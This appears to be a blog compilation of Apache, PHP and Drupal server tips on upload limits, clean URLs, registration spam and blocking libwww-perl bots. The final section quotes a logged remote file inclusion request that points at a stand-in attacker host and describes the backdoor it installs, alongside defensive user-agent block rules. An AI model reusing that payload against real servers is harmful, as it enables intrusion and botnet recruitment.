Upload Max Filesize PHP Configuration

[dfads params=’groups=-1′]

I have installed Apache2, PHP5.5 & MySQL5 independently on my Debian 7.3 OS. I hosted my drupal site on my Dedicated Server. I faced problem to upload files greater than 2MB from the CMS of the Site. After exploring the Internet I found the solution. Here’s the steps:

1. Edit /etc/php5/cgi/php.ini file.

2. Add the following line of code:

[php]upload_max_filesize = 10M[/php]

Make sure that you are not editing /etc/php5/php.ini file

[dfads params=’groups=-1′]

Solution to Url Encoded Slashes (%2F) Problem in Apache

[dfads params=’groups=-1′]

I was working on Drupal 6. I had to troubleshoot a site that has a problem in its link. The ugly URL looks like this: http://rcportblair.ignou.ac.in/admin/build/employee/search/result/none/0/none/%252F1

The last argument in the link i.e. %252F is a forward slash automatically added by the Drupal engine which was creating problem while generating result. There are many ways to handle these urls. One way is listed below:

<VirtualHost *:80>
    AllowEncodedSlashes On
</VirtualHost>

This directive may be set in server config file (e.g. httpd.conf OR /etc/apache2/sites-available/default) and may appear inside <VirtualHost> containers to affect certain websites. Using it in .htaccess files is not allowed.

[dfads params=’groups=-1′]

Clean URLs in CodeIgniter and Drupal for Debian based Dedicated Servers

[dfads params=’groups=-1′]

Initially, when my projects were in CodeIgniter I struggled to find out the solutions for Clean URLs. Now, I am working on Drupal CMS and the process for activating Clean URLs are similar as in CodeIgniter.

drupal&CodeIgniter

1. The first step is to add the following code in your .htaccess file.

<IfModule mod_rewrite.c>
RewriteEngine on

# Rewrite URLs of the form 'x' to the form 'index.php?q=x'.

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ project_dir/index.php?q=$1 [L,QSA]
</IfModule>

2. Next, for Debian Linux OS edit /etc/apache2/sites-available/default file and add the following script.

<Directory "/var/www/project_dir/">
RewriteEngine on
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ project_dir/index.php?q=$1 [L,QSA]
</Directory>

3. If you are using CodeIgniter, the above two steps are done but for Drupal sites, visit the following link from your Drupal CMS Admin: http://your_site/admin/settings/clean-urls. Select the Enabled radio button & click on save.

Congratulations, You have activated Clean URLs for your websites.

[dfads params=’groups=-1′]

Apache is running a threaded MPM, but your PHP Module is not compiled to be threadsafe. You need to recompile PHP.

[dfads params=’groups=-1′]

After installing Apache2, MySQL & PHP on Debian wheezy 7.1, I tried to reboot the apache server. It showed me the following error.
Starting web server: apache2[Fri Dec 27 11:29:16 2013] [crit] Apache is running a threaded MPM, but your PHP Module
is not compiled to be threadsafe. You need to recompile PHP.
Pre-configuration failed
Action 'start' failed.
The Apache error log may have more information.
failed!

So I searched through the internet to recomplie the PHP Source. But none of the tutorials were best and feasible.

Finally, after long try I found the command below that helped me to run the apache and PHP along.
apt-get install apache2-mpm-prefork

[dfads params=’groups=-1′]

How to stop/prevent drupal registration spam?

[dfads params=’groups=-1′]

I am a web developer at IGNOU. I have been maintaining IGNOU Website ignou.ac.in since August, 2013. Yesterday, my colleague found that there were number of users automatically registered and asked me to handle the issue.

I studied the issue and found that the users registered were spam having similar kind of email addresses. I explored the internet and found a solution.

Block the offending domains:

I went to the Access Rules section in the admin panel (admin/user/rules), and added a DENY rule for each of the domains. The rule configuration takes a wildcard, so I could simply enter %@http://pray.agencja-csk.pl.

I also found that access rules functionality has been removed from the Drupal 7 core. It is now provided by the User restrictions module.

[dfads params=’groups=-1′]

Embed your latest tweets on your website the API v1.1

[dfads params=’groups=-1′]

Procedure

Side note: There are many ways to connect to Twitter, but this post isn’t about how to make authenticated calls to the API. Here, we are just going to focus on the simple display of a timeline without authentication.

  1. Log into your twitter account
  2. Go to your widget management page using https://twitter.com/settings/widgets
  3. Create your widget choosing the timeline source of your choice (user, favs, list or search)
  4. Copy and paste the code into the HTML of your site.
  5. Change the settings you are able to change (which isn’t much) to your liking (read from Client Side Options and onwards on the embedded timelines page)

Example

A simple example with a status timeline limited to 5 tweets (data-tweet-limit=”5″), a transparent background, no header, no footer (data-chrome=”nofooter noheader transparent”), and the color of my choice for the links (data-link-color=”#1BB5E0″) and borders (data-border-color=”#B5DDE8″).

 

Screenshot from 2013-08-16 17:37:39

[dfads params=’groups=-1′]

The rise of bots, spammers, crack attacks and libwww-perl

[dfads params=’groups=-1′]

libwww-perl (LWP) is fine WWW client/server library for Perl. Unfortunately this library used by many script kiddy, crackers, and spam bots.

Verify bots…

Following is a typical example, you will find in your apache or lighttpd access.log log file:

$ grep ‘libwww-perl’ access.log

OR

$ grep ‘libwww-perl’ /var/log/lighttpd/access.log

Output:

62.152.64.210 www.domain.com - [23/Oct/2006:22:24:37 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.someattackersite.com/list.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"

So someone is trying to attack your host and exploit security by installing a backdoor. yesno.phtml is poorly written application and it can run or include php code (list.txt) from remote server. This code install perl based backdoor in /tmp or /dev/shm and send notification to IRC server or bot master i.e. server is ready for attack against other computer. This back door can flood or DDoS other victims server (it will also cost you tons of bandwidth). Usually attacker will hide himself behind zombie machines. Blocking by user agent can help and in some cases problem can be dropped all together.

You will also notice that libwww-perl/5.76 as browser name (read as useragent). To avoid such attack:
=> Block all libwww-perl useragent
=> Run web server in chrooted jail

How to block libwww-perl under Lighttpd web server?

Open lighttpd.conf file:
# vi /etc/lighttpd/lighttpd.conf
Append following line to main server or virtual hosting section:
$HTTP["useragent"] =~ "libwww-perl" {
url.access-deny = ( "" )
}

Save and close the file. Restart the lighttpd:
# /etc/init.d/lighttpd restart

How to block libwww-perl under Apache web server?

Use mod_rewrite and .htaccess file to block user agent libwww-perl. Open your .htaccess file and add rule as follows:
SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots

How do I verify that User-Agent libwww-perl is blocked?

Download this perl script on your own workstation. Replace http://your-website.com/ with your site name:
$req = HTTP::Request->new(GET => 'http://your-website.com/');
Save and execute perl script:
$ chmod +x test-lwp.pl
$ ./test-lwp.pl

Output:

Error: 403 Forbidden

You should see 403 Forbidden error as your user-agent is blocked by server configuration.

Please note that blocking by user agent can help, but spammers spoof user agents. My personal experience shows that blocking libwww-perl saves bandwidth and drops potential threats by 50-80%.

Another highly recommended solution is to run web server in chrooted jail. In chrooted jail attacker cannot install backdoor as shell and utilities such as wget not available to download the perl code. I also recommend blocking all outgoing http/ftp request from your webserver using iptables or use hardware based firewall such as Cisco ASA Firewalls.

Final extreme solution is to put entire root file system on read only media such as CDROM (or use live CD). No attacker can bring down your web server if it is serving pages from read only media (except DoS/DDoS attack).

What do you think? How do you block such attacks? Please share your nifty technique with us.

 

[source 1=”http://www.cyberciti.biz” language=”:”][/source]
[dfads params=’groups=-1′]